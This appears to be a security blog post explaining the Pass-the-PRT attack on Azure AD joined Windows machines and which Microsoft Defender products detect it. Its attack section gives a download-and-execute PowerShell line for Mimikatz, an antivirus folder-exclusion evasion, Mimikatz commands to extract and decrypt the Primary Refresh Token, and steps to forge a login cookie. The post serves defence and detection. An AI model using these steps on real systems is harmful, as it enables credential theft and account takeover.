Pass-the-PRT attack and detection by Microsoft Defender for ….

Active Directory lateral movement attack(s) via MimiKatz (e.g. pass-the-hash, pass-the-ticket, etc.) via domain-joined machines are detected by Microsoft Defender for Identity (MDI).

Please Microsoft: rebrand MDI to MDAD (Microsoft Defender for Active Directory) so people don’t get confused Azure AD is not in-scope of the detection.

MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).

The lifetime of a Primary Refresh Token is 14 days!

The attack

First we need to verify if the computer is (hybrid) Azure AD joined via dsregcmd.exe /status

Second we need to download and execute MimiKatz from memory
iex (New-Object Net.Webclient).downloadstring(“https://<download-location>Invoke-Mimikatz.ps1”) or from disk by excluding a folder in the Windows Security settings.

Extract the PRT and the session key (both are needed) from the logged on user with MimiKatz.

Privilege::debug
Sekurlsa::cloudap

Copy and store the <PTR> and <KeyValue>.

Now we need to elevate permissions to SYSTEM (default) and use the DPAPI (Data protection application-programming interface) function cloudapkd (Azure PRT Key Derivation) to decode the <KeyValue> from <ProofOfPossesionKey>.

Token::elevate
Dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect

Copy the <Context> and <Derived Key> values, and with the <PRT> value we can generate a PTR cookie on another machine (not Azure AD joined).

Dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>

The <Signed JWT> (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session (edit the Chrome cookie for login.microsoftonline.com with the values:

Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
HttpOnly:

Detection

Microsoft Defender for Identity (MDI) can only detect on-premises Active Directory attacks.

Azure AD Identity Protection

Azure AD Identity Protection (IPC) is the Microsoft solution to detect Azure AD attacks (compromised credentials and/or anomalies), the pass-the-PRT attack cannot be detected due to the nature of SSO and the use of Tokens.

Microsoft Defender for Endpoint / Microsoft 365 Defender

Microsoft Defender for Endpoint (MDE) and/or Microsoft 365 Defender however detects the pass-the-PRT attack in the first stage of the attack (retrieving the PRT).

The Incident (consists of 8 correlated Alerts) is triggered and the attack can be stopped (e.g Isolate device from the internet).

So to Detect (and Respond) to Online attacks it’s important to implement a defense in-depth detection layer (the Microsoft Defender for … Identity, Endpoints, Office 365 and Azure) with Protection via the zero trust (implicit trust of the chain) principle.

Many thanks to all the resources on the internet, especially Benjamin Delpy and Dirk-jan Mollema, a fellow dutchman).

Chief Technology Officer @ Nedscaper